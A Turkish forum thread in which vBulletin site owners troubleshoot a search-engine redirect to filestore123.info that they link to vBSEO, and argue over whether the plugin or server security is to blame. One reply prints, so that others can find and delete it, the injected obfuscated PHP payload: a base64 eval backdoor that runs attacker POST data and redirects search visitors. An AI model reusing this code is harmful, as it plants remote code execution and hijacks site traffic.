Googlede arandığında ilk tıklamada filestore123.info adlı siteye yönlendirme var.Ben vbseo yu kapattığımda ise bu sorun kalkıyor.Sorun nedir yardımcı olursanız sevinirim.VBseo dışında hiçbir eklenti kurulu değil sitede
This is a discussion on filestore123.info sorunsalı within the Türkçe forums, part of the General Discussion category; Googlede arandığında ilk tıklamada filestore123.info adlı siteye yönlendirme var.Ben vbseo yu kapattığımda ise bu sorun kalkıyor.Sorun nedir yardımcı olursanız sevinirim. ...
Googlede arandığında ilk tıklamada filestore123.info adlı siteye yönlendirme var.Ben vbseo yu kapattığımda ise bu sorun kalkıyor.Sorun nedir yardımcı olursanız sevinirim.VBseo dışında hiçbir eklenti kurulu değil sitede
bu sorunu bir arkadaşımda yaşadı,ama kendi kendine düzeldi anlayamadık bir türlü sebebini,aynı şekilde lisanslı vbseo kurulu sitesinde.
Forumdevi.com Forum Devi - Eğlencenin Devi
bunun vBSEO ile alakası yok. Bu sorun direk olarak server güvenliğiyle alakalı. Ancak güncelledikleri plugin vBSEO'nun bir plugini oluyor. Admincp'den vbseo product dosyasını import ederseniz sorununuz geçici düzelir. Gerçekte server güvenliğinizi arttırmanız lazım.
Mert Gökçeimam / Crawlability Inc.
vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!
Twitter:@Depkac
Personal Blog : Mert Gökçeimam
Aynı sorunu bende yaşıyorum, iki gündür hitlerim yerlerde,
Ancak güncelledikleri pluginvBSEO'nun bir plugini oluyor. Admincp'den vbseo product dosyasını import ederseniz sorununuz geçici düzelir. Gerçekte server güvenliğinizi arttırmanız lazım.
Biraz daha açar mısınız ne tür bir önlem almamız gerekir, bir çok arkadaşımız aynı sorunu yaşıyor
edit..
Server ile görüştüğümde aşağıdaki yanıtı aldım;
"Aynı sorunu, directadmin panelli bir host sunucu sahibi müşterim de yaşadı
Bence problem, vbseodan."
Server ile görüştüğünüzde ne söyledikleri beni zerre alakadar etmiyor , hostlar her zaman bilmedikleri çözemedikleri sorunları başka şeylerin üzerine yüklerler. Sorunun vBSEO ile zerre alakası bulunmuyor.
Hostunuz basitçe server güvenliğinizi sağlamakla yükümlü bunu yapamıyorsa kaçın gidin o hosttan. Bundan dolayı her zaman profesyonel işinde uzman hostlar ile çalışın derim.
Last edited by Mert Gökçeimam; 02-07-2012 at 04:51 AM.
Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!
Mert beye katılıyorum,benimde başıma bu tarz bir olay geldi yine server ile alakalı bir durumdu,gene suçu müşteriye attı hostcu vbseodan kaynaklı cpu harcıyor dediler,sunucumu değiştirdim şuan hiç bir problem yaşamıyorum.
vBulletin sürümünü upgrade edin. Veya vB aynı dosyaları tekrar yükleyin config haricinde.
vBSEO plugini silip tekrar yükleyin.
Ben ancak o sekilde kurtulabildim.
Mert bey, ben sorun illa vbseodandır demiyorum ve host sorunu sizi alakar eder de demedim. Sadece sizinle paylaştım. bu sorunu bir çok kişi yaşıyor ve burada sorununu yazıyorsa sizi alakadar eder diye düşünüyorum. Benim hostum iyi bir firmada barınıyor basit bir yerde değil. Firma yetkilileri sunucu güvenliğini arttırdıklarını söyledikleri halde sorun aynen devam ediyor. Linklerim hala yönleniyor. Tam olarak güvenliği daha nasıl sağlayabiliriz, lütfen konu hakkında yardımcı olun.
Teşekkürler.
phpmyadminde datastore kısmında pluginlist bölümüne gelin düzenle diyip ctrl+f tuşuyla ;bu kodları bulup silmeniz taktirde sorun düzelir.işlemi yapmadan yedek alın mutlaka.eval(CHR(36).CHR(120).CHR(61).CHR(39).@b1d34366684 9f5488637994cc512a61e.CHR(39).CHR(59).@base64_deco de('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZG Vjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4 KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2 V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZF UlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUk VGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlm KHN0cmxlbigkcik+MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU 1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0K CWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG 9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1h cnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3 NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5k ZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcy AkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxz ZSkmJihlbXB0eSgkX0NPT0tJRVsndmJzcCddKSkpDQoJCQl7DQ oJCQkJJGg9c3RydG91cHBlcihzdWJzdHIoQG1kNSgkX1NFUlZF UlsnSFRUUF9IT1NUJ10pLDAsOCkpOw0KCQkJCWRpZSgiPGh0bW w+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRl eHQvamF2YXNjcmlwdFwiPnZhciB2YnNwPSckaCc7Ii5zdHJfcm VwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2Rl Y29kZSgnWFZMYmN0b3dGUHdWbXBtT3BMRkR1QmdNY2QxTVFxQk 43MDNhdmxocVJ3Z0JEbUFjWXk2SjVYL3ZpaFFtVTl2SFo3VjdM dnNndlpGek9sDQo0bktvK1hDVTFkNlNwMzVtcDN4QW9kSG5uRm lrem42d3pvamJ3ZzVGelRWR1lyZlpQa1ZKMUp4cGhEcVFyVmE4 bmVObHNYZDNrV0o1UHFPRg0Kc3VlbE9aOVpZalRaWFQ2TEp6Vm MyWHp5cHR0aGtyZzNoTVh4RlN6WFE2bDByVHM5OW43clBPV0xH ZHhuTTBucDZ5WWhRQk1CSE9JaVdNc2INCmljaGRIUm56NzRxNk JRbENKNDRmMGdFYjUxU0Jtb3NGNEdMeWJEZ0IzS2lqUk1qellT dmEzYzZrbC9sMUxDaDhTeEN4MkxYREloek4wM2xPDQpXL2xXbE pTVjZSWVhUQ24vaVFLNTV3emUvNThNUTk0YlAvaVV1K0EvV0pq MEdsUURNZVcxcnhFZi9JUDZQeUMzQUtjY21mclBBQVljUS9nTg 0KaTN4NGNaWTc1QzRaekhmR0twYXo3QXFMR0Y3K3d2UTlQRHZr UURMUzAxeDBHaDd6MmY0TDNuMy9oM2lObmVnMTF2M1Z6dDk5MU RYeURmd28NClFkdE1McENwMXp4QjE2RnJBaGduN2xrYTdkSGl2 eXlqUzhxWHlsTEpoR01xb0xRVzJ1SVRQbkJ3dnl5amFVVVVNNG xtMWFOdGdBZVVLRWEwDQpkR0xlSDBuQzFBVzVUQkk1V1JMMXda ZGNSelZSZFZNdm9wbkY4QmNWc2QreEZ6ZlA3VWR0Mk9QelM3ZH N2c2ZBOTVnT2dDMTh5dU1iQzZWLw0KZlVEa3J6R2dyQ2J5SjNF T0JhdHFNUHJvRnMrUjZpYmpZeU8zWTJ6R2lwMWd1ZDVFY0txeG 8xRTZkRHBWRHVZL1FWbVA1Unh5Qy9iUTdYRHkNCldZM3F3akxn MnVGYzRvOTlEbXc0VUhSNjJtdVphNUJnSGo3VGF5blRrd25iWl hzNCtwMTh4bXVFcEpkWlhPNDV3U2d4dFljNHVTc2I4JykpKS4i PC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ 0KCX0gDQp9'));
Bizim işimiz software yazmak. Server Adminlerinin işi server güvenliğini sağlamak. Soruyu yanlış kişiye soruyorsunuz. Her ay dünya para verdiğini kişiler bunu sağlamak zorunda. Kusura bakmayın ama başkalarının yapması gereken işleri biz yapamayız. Yapmıyorlarsa yapacak firmaları bulmak sizin yapmanız gereken birşey.
Tamam da söylediğiniz gibi ise
Ancak güncelledikleri plugin vBSEO'nun bir plugini oluyor.
demekki yalnızca bahsettiğiniz vbseo plugini'ni değil tüm plugin'lerde oynama yapabilirler. Ya da vbseo'da farklı bir açık var.
Hangi dosyaya müdahale edebiliyorlar ki böyle bir yönlendirme yapabiliyorlar? Bu konuda fikriniz varsa bizde ona göre bir çözüm yolu arayalım.
Acaba vbseo son versionunu yüklesek yine aynı şekilde müdahale edebilirler mi?
vBSEO'da herhangi bir açık yok , serverınızda açık varsa bırakın vBSEO'nun plugin'ini herşeyinizi modifiye edebilirler.
Serverımızda açık varsa herşeyi yaparlar diyorsunuz da, neden herşeyi yapmıyor bu insaflı lamer arkadaşlar acaba? Ve eklenti kapatılınca neden sorun ortadan kalkıyor? Demekki bu eklentininde bir kabahati var. Bunun başka bir açıklaması varsa izah edin bilelim.
Çünkü amaçları zarar vermek değil , sizin sitenizin trafiğini kullanarak para kazanmak.